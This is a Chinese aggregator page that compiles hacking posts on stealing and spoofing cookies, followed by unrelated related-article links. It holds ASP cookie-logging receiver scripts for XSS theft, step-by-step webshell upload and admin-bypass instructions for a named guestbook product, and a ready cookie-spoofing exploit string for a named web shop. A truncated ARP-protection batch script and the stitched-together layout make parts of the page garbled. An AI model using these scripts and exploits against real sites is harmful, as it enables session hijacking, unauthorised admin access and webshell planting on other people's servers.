关于XSS欺骗cookie的代码
“乱码jnfxivkjf”通过精心收集,向本站投稿了5篇关于XSS欺骗cookie的代码,下面就是小编给大家带来的关于XSS欺骗cookie的代码,希望能帮助到大家!
篇1:关于XSS欺骗cookie的代码
Tosec Security Team 'Blog
忙乎了半个小时写这句XSS代码,几个月没有复习快忘记的差不多了,这里给记录一下吧,自己要求的基本效果是不影响对方页面,所以必须加入一个返回的要求
在这个语句中可以自由变换其形,达到自己的要求即可
下面这句是用img的html元素写的,常用script已经不再流行了,往往更换一个类型可能更有意思
上面的语句意思很简单,就是掉到cookie后返回前一页,达到隐藏的一个小目的
附asp欺骗代码:
<%
testfile=Server.MapPath(“自定义文件.txt”)
msg=Request(“自定义数据表”)
set fs=server.CreateObject(“scripting.filesystemobject”)
set thisfile=fs.OpenTextFile(testfile,8,True,0)
thisfile.WriteLine(“”&msg& “”)
thisfile.close
set fs = nothing
%>
篇2:盗取cookie代码及利用
利用代码:
###################################################
<%
dim getcookie
dim mytime
dim str
getcookie=Request.QueryString
getip=Request.ServerVariables(“REMOTE_ADDR”)
mytime=now
set fs=server.CreateObject(“Scripting.FileSystemObject”)
set file=fs.OpenTextFile(server.MapPath(“cookie.txt”),8,True)
str=“<-bof||”& mytime & “||” &getip & “||” & getcookie & “||eof->”
file.writeline(str)
file.close
set file=nothing
set fs=nothing
response.write “haha”
response.end
%>
###################################################
篇3:防止ARP欺骗的编程代码
[复制此代码]CODE: @echo OFF arp -d if %~n0==arp exit if %~n0==Arp exit if %~n0==ARP exit echo 正在获取本机信息..... :IP FOR /f skip=13 tokens=15 usebackq %%i in (`ipconfig /all`) do Set IP=%%i GOTO MAC :MAC echo IP:%IP% FOR /f skip=13 toke
篇4:快捷留言簿v10.09 正式版上传漏洞和Cookie欺骗漏洞漏洞预警
上传漏洞:
漏洞页面:/up/add.asp
利用方法:直接在留言本后面加个漏洞页面地址:譬如:localhost/up/add.asp,
本地构造x.asp;.jpg的图片木马,利用iis6.0的解析漏洞,直接上传。获取webshell,
至于webshell地址:默认为:/up/uploadfile/0701_(上传的文件大小字节)_(文件名称).gif
其完整webshell地址示例:localhost/up/uploadfile/0701_28_x.asp;.jpg
有些留言本,前台关闭了上传功能。但是上传的页面。照样是可以打开的。并不妨碍我们传webshell,至于webshell地址中的“0701”是在配置文件之中配置的。一般来说。没多少人会去更改的。如果确实更改了。你可以传上去。再回到留言首页。查看地址。
Cookie欺骗漏洞:
漏洞页面:/up/admin_main.asp,/up/admin_list.asp
其之代码里面,用了Cookie验证。导致可以欺骗进入管理后台,然后设置上传类型。
最后上传得到Webshell,其之漏洞代码如下:
<%if request.cookies(“picc”)(“picc2”)“” then%>
<%
Dim Msg
If Request.QueryString(“Action”) = “Save” Then SaveData
Sub SaveData
myConn.execute(“update Config set OKAr=’”&Request.Form(“ftype”)&“’,OKsize=”&Request.Form(“fsize”))
Msg = “成功修改了文件数据信息”
End Sub
If msg “” Then
Response.Write(“
点击此处返回”)
Response.End()
End If
%>
至于如何利用,
大家自己去琢磨吧,我想应该不难哦。
篇5:正版逍遥网店系统 V3.0 COOKIE欺骗漏洞漏洞预警
OK开始,这是一个网店,本来我想先找注入,貌似注入都过滤了,于是我又来到后台,看了下检测文件,悲剧由此产生:
漏洞文件:checkadmin.asp
<%
if request.cookies(“buyok”)(“admin”)=“” then response.write “
%>
大家看到这里一定以为很简单吧,呵呵 直接COOKIE欺骗就可以进后台,如果真的这样我就不发了~!留个悬念让大家去试试。
然后我进入后台,127.0.0.1/admin/index.asp.自动跟我弹了回来。我当时就郁闷了。继续看代码。
index.asp
网店后台管理
此网页使用了框架,但您的浏览器不支持框架,
看到这里我奇怪了,是调用checkadmin.asp啊 为什么进不了后台。我看到了main.asp。
继续跟进。代码就不发了免得多,最后发现了一个文件。
漏洞文件:include\buyok_functions.asp
下面贴出部分代码:
set rscheck=conn.execute(“select * from buyok_user where UserId='”&request.cookies(“buyok”)(“userid”)&“'”)
if rscheck.eof and rscheck.bof then
response.write “”
response.end
看到这里大家都懂了吧 呵呵~!
OK附上EXP:
KHWJCNQIVQNSXKMKKYHP=GVPLGBWIQTXZICBWSAALROKUCZBJDYHJMYPDEMHE; buyok=userid=1&temp=login&admin=admin;
修改COOKIE 然后直接进入127.0.0.1/admin/index.asp.
后台:localhost/admin/login.asp
作者:风之传说
【关于XSS欺骗cookie的代码】相关文章:
1.凡人网络购物系统 V8.0 简体中文版 Cookie欺骗漏洞利用
2.欺骗检讨书
4.欺骗的近义词
5.欺骗作文300字
6.欺骗的反义词
10.欺骗老师检讨书范文






文档为doc格式